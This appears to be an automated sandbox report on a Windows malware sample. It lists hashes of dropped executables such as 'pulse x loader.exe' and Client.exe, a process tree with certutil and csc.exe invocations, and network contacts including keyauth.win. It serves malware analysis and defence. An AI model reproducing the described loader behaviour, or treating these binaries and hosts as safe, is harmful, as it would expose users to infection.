| SHA256 | f70ff68f63bdbc74f20647d2f96c1c9e4c1b783f059f901a6c2d09b1741fba1a |
| SHA512 | 404f73505792ffb73a82a004afa9f4e7423cacae6dc945532d1434970fc9e4836da9497734ab9e9a41f5b1b2c07ff6a78036d328b332ba78204eede011117a28 |
C:\Users\Admin\AppData\Local\Temp\CabF588.tmp
| MD5 | 753df6889fd7410a2e9fe333da83a429 |
| SHA1 | 3c425f16e8267186061dd48ac1c77c122962456e |
| SHA256 | b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78 |
| SHA512 | 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444 |
memory/1784-125-0x0000000003FE0000-0x0000000003FE1000-memory.dmp
memory/3068-127-0x0000000074840000-0x0000000074F2E000-memory.dmp
memory/1784-145-0x0000000002B20000-0x0000000002B30000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-09 23:11
Reported
2024-03-09 23:15
Platform
win10v2004-20240226-en
Max time kernel
173s
Max time network
184s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\custom111.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\switched.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\switched.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\custom111.exe
"C:\Users\Admin\AppData\Local\Temp\custom111.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3952 --field-trial-handle=2656,i,16940681401824032220,151921362336696246,262144 --variations-seed-version /prefetch:8
C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
C:\Users\Admin\AppData\Local\Temp\switched.exe
"C:\Users\Admin\AppData\Local\Temp\switched.exe"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cww0hbcg\cww0hbcg.cmdline"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 142.250.179.234:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | keyauth.win | udp |
| US | 104.26.1.5:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | 5.1.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| GB | 173.222.13.40:80 | x2.c.lencr.org | tcp |
| US | 104.26.1.5:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | 40.13.222.173.in-addr.arpa | udp |
| N/A | 127.0.0.1:49884 | tcp | |
| N/A | 127.0.0.1:49886 | tcp | |
| N/A | 127.0.0.1:49891 | tcp | |
| N/A | 127.0.0.1:49893 | tcp | |
| US | 8.8.8.8:53 | 175.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.72.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | 3ca169e7dd598b61e50b2596c8fef2b1 |
| SHA1 | 81c3483719d5a4476cec71c827c0ec4feb085f34 |
| SHA256 | 95257639438064d9256ffeeef2b6498a488c2f183472c79d8b3e15a7ded4fe83 |
| SHA512 | 2bb8f5dc48e16d887916dbce1d2871b9640a60c5237aa0ea5d68016d4cef6315e4a3462e3cbae30ec3bca20c33dd2472b301bc7cf9fd0ab69b7871ebfb13afd8 |
C:\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | 52d1ed39a91e338853e5e569a20cc51f |
| SHA1 | dd97d913951a496b636b2a0ec31a37cf1eba89fa |
| SHA256 | 4edc517c79a7e2612180b2b428d7f4000ba7f77fa4cf8f12551a6fac82fddbc7 |
| SHA512 | 65de442cc576598e8d62dcb476e3cbee01a5d0bdb0e3a2e1769bfae622586d6986b115b69f6d4c1e2e6eab2b9c5d3847d404a504e7db0c610b2806a24202c678 |
C:\Users\Admin\AppData\Local\Temp\switched.exe
| MD5 | 1a585b268ae3dfc74601794a69b27b3d |
| SHA1 | fb9156c02f684b8ef052e5a3ef29769a337377de |
| SHA256 | 107c642f5a6301a00d8de2684a1cee41faef8f12f9325888ff0a9400f895fd03 |
| SHA512 | 2b4f10eabc9dbef226cc5f962bb301e5745b3a632be9171f5f0ea665f4d0824a499abcf6be01171352fc2423172fd37eae0f30870680e649eb037d8b64408dc6 |
C:\Users\Admin\AppData\Local\Temp\switched.exe
| MD5 | 9d70b31636f98dd714093f0370028fec |
| SHA1 | aa9754cb8aaff2480635475e3e0580a91ebd2e39 |
| SHA256 | 9395fb97b98370192b7a9703dc6692b990c82edb016c771b38070a74fb6132ea |
| SHA512 | 217b8d873219eeade58baa0e64ba3f487c38ee064c4e605d89f2b85322641e3ed3595d96e41eb0b4f31c8327053c95df418c6fcdb3190fcb8701fd68fe760888 |
C:\Users\Admin\AppData\Local\Temp\switched.exe
| MD5 | 8acd36edfeff37e0994c1987cf94a714 |
| SHA1 | ecaf0cc174c3539feb90d79a9a3c22d16e5c54f7 |
| SHA256 | 7b771c4bda57f4d118f7b208d8c4f0af9225dffa36d41ca152f4466a27303df6 |
| SHA512 | f8b45d5ac9fb7ad122ac1c6d2b18f8cbefb11138ba772de310093ed33c121257ebb727b48275cc02140ae1a3d3bd4d28ca126c89e5acabdb04d1f6cbf09b2f05 |
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | 49ff0d28046935ef1a54a71b8c4c49af |
| SHA1 | 64b89355e3c097eb90e789cd7e0605665879508e |
| SHA256 | 2ae5003110440596247b9a3a992af5e0b97da6591abec0d0b72ac91c265ffe65 |
| SHA512 | 6e276f5d58de26fcbe5be9661ea268a4749d7833405480cc530a67093b10c2ba6dfabf2ae61c5e48a06372f6431196c1f6fef9e2955019bf1b012c9b38c931e1 |
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | ba12cb4a3ac2edad168c4a560aa267b4 |
| SHA1 | 29aaf147a426164ecca7a2d285a44c3a3c0008c1 |
| SHA256 | 30a3041e4ae5f1afcaea92d31279f326715ef8c32f9466c74975bc4d3db9e482 |
| SHA512 | 44413dd70987672a9cb127c7ac52636568fe004fca2d1128b32863a3ac28d8a8c6a393d30757df25698b3fe7252ca2ddbbb5db2ca78db76d10d97f82046eabff |
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | 332a5c22c058b271f27ac3d7c0cd82f0 |
| SHA1 | 3fcf1b35a61cfecdc153bc3c3f66f25dee5d07f0 |
| SHA256 | a549601f701734185b84b2157ce62a144a20b2d7587b127c6d218e8765e14c2a |
| SHA512 | f37cd81fc02b6112989b8c69087f5fff26de0175647594794356e1b664875b7ca2baa39ed8fe877d9a86aa7429a235e21b4a8e49bc6fcae0364797329aeae1ec |
memory/4356-36-0x00007FF619650000-0x00007FF619A8C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
| MD5 | 0f0838bc6642dd6bc603368e50b4aba3 |
| SHA1 | 932bd4d1c11996bf8ac3ac74a94b266e96d44c36 |
| SHA256 | 4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9 |
| SHA512 | a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860 |
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
| MD5 | 42fd033140c0e5ce96c34756615d095a |
| SHA1 | 6b9c25b23cfa2a398a4ea67021c43b6030eac5dd |
| SHA256 | ef397a59c2c231186b6171c8524f187ee92bcf42b8670fca1e05d0c3a356fc4b |
| SHA512 | d32cd706d0c2f51f2c114b8f5aad298890af94d3736285b987761a2da3028265d2d142f4b40c9f0d2f8c9a68da1419c28527abc3568354d17e5ba6aef0dd5001 |
C:\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | 339fa0249a4df86a6f48b8ca5eb71c50 |
| SHA1 | 893e508cf08829af4b0933426ad25597a6dcf893 |
| SHA256 | dc0a80c2d0cd372c11749f3b48c6c7d06049ff42b87e47a34ee4b227cc0fad88 |
| SHA512 | 1ecc89cf4b7066fd7e31edcd60249a240e290666a14e3adaf5df25ff73a4306af6985d2e6e6d683d8c988e7dc17c092f8466fc712310b3db60d2f8667faf8adf |
memory/2784-39-0x0000000074E80000-0x0000000075630000-memory.dmp
memory/4768-40-0x0000000074E80000-0x0000000075630000-memory.dmp
memory/4768-41-0x0000000000950000-0x00000000009D2000-memory.dmp
memory/2784-42-0x0000000000590000-0x0000000000BD0000-memory.dmp
memory/4356-43-0x00007FF619650000-0x00007FF619A8C000-memory.dmp
memory/2784-44-0x0000000074E80000-0x0000000075630000-memory.dmp
memory/4768-45-0x0000000074E80000-0x0000000075630000-memory.dmp
memory/4768-46-0x0000000005730000-0x00000000057CC000-memory.dmp
memory/4768-47-0x00000000057D0000-0x0000000005862000-memory.dmp
memory/4768-48-0x0000000005990000-0x00000000059A0000-memory.dmp
memory/2784-49-0x00000000057A0000-0x00000000057B0000-memory.dmp
memory/4768-50-0x0000000007360000-0x0000000007904000-memory.dmp
memory/4768-51-0x0000000005990000-0x00000000059A0000-memory.dmp
memory/2784-52-0x00000000057A0000-0x00000000057B0000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\cww0hbcg\cww0hbcg.cmdline
| MD5 | eab87d0fb9657854c23af86ad9eb9310 |
| SHA1 | 041c96e0e1fe47acdbcf546f8f4ef0ae9e29d0d4 |
| SHA256 | f125e4128785432ee40c8fff5281d38bf021189b35236a6f89e8931e0cac31ab |
| SHA512 | 7166dfcee42c5269ab89514db9e71050296e5895e94757b0f022916ccd4bbcd40ad8a32ea65729f3661aa6298079803201313a033b9bfdc15f8e024040446aaa |